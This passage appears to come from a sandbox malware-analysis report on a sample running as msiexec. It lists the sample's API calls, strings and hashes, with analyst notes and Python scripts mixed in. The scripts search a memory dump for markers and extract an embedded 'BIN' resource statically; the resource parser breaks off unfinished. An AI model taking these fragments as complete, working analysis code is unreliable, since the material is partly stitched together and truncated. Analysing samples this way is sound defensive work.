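SAMPLE_DUMP += b'<table dir="rtl"><tr><td>'

if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    print(result["verdict"])
    for marker, locs in result["html_markers"].items():
        print(f"{marker[:40]!r}: {locs}")
    for name, locs in result["shell_folders"].items():
        print(f"{name!r}: {locs}")
```

Run it against a real dump by replacing SAMPLE_DUMP with the file's bytes; the UTF-16LE search matters because an ASCII-only strings pass will miss every one of these markers in a process that built them with the wide CRT functions.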
                                                                                            APIs
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                            • String ID: 4$h
                                                                                            • API String ID: 4019544885-1856150674
                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 4066108131-3849865405
                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memset.MSVCRT ref: 00408362
                                                                                            • memset.MSVCRT ref: 00408377
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 290601579-0
                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                            APIs
                                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                            • memset.MSVCRT ref: 0044505E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memchrmemset
                                                                                            • String ID: PD$PD
                                                                                            • API String ID: 1581201632-2312785699
                                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2163313125-0
                                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3592753638-3916222277
                                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                            • String ID: %s (%s)$YV@
                                                                                            • API String ID: 3979103747-598926743
                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                            • API String ID: 2767993716-572158859
                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 3176057301-2039793938
                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                            APIs
                                                                                            Strings
                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                            • database is already attached, xrefs: 0042F721
                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                            • out of memory, xrefs: 0042F865
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                            • API String ID: 1297977491-2001300268
                                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                            • String ID: ($d
                                                                                            • API String ID: 1140211610-1915259565
                                                                                            • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                            • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                            APIs
                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3015003838-0
                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00407E44
                                                                                            • memset.MSVCRT ref: 00407E5B
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 59245283-0
                                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            • API String ID: 3510742995-3273207271
                                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                            • String ID: 3A
                                                                                            • API String ID: 3300951397-293699754
                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                            • String ID: strings
                                                                                            • API String ID: 3166385802-3030018805
                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                            • String ID: r!A
                                                                                            • API String ID: 2791114272-628097481
                                                                                            • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                            • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                            • String ID: BIN
                                                                                            • API String ID: 1668488027-1015027815
                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
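The six calls listed above are the standard resource-loading sequence: GetModuleHandleW(NULL) for the image base, FindResourceW(hModule, 50, L"BIN") to locate a resource of type "BIN" with ID 50, LoadResource / SizeofResource / LockResource to map it, and a memcpy of the whole thing into a buffer the sample allocated. The Python below is an added example (not code from the Joe Sandbox report or from the sample) that walks a PE resource directory the same way, so the blob can be carved out of the file on disk without running it. It constructs its own one-entry .rsrc section for testing; the section RVA 0x3000 and the language ID 1033 are assumptions of the test input, not values from the report.

```python
import struct

# Added example, not code from the Joe Sandbox report or the analysed sample.
# Walks an IMAGE_RESOURCE_DIRECTORY tree (type -> name -> language -> data)
# and pulls out the entry that FindResourceW(hModule, 50, L"BIN") would
# return, so the embedded blob can be examined statically.

NAME_IS_STRING = 0x80000000      # high bit of an entry's Name field
DATA_IS_DIRECTORY = 0x80000000   # high bit of an entry's OffsetToData field


def _read_name(res: bytes, off: int) -> str:
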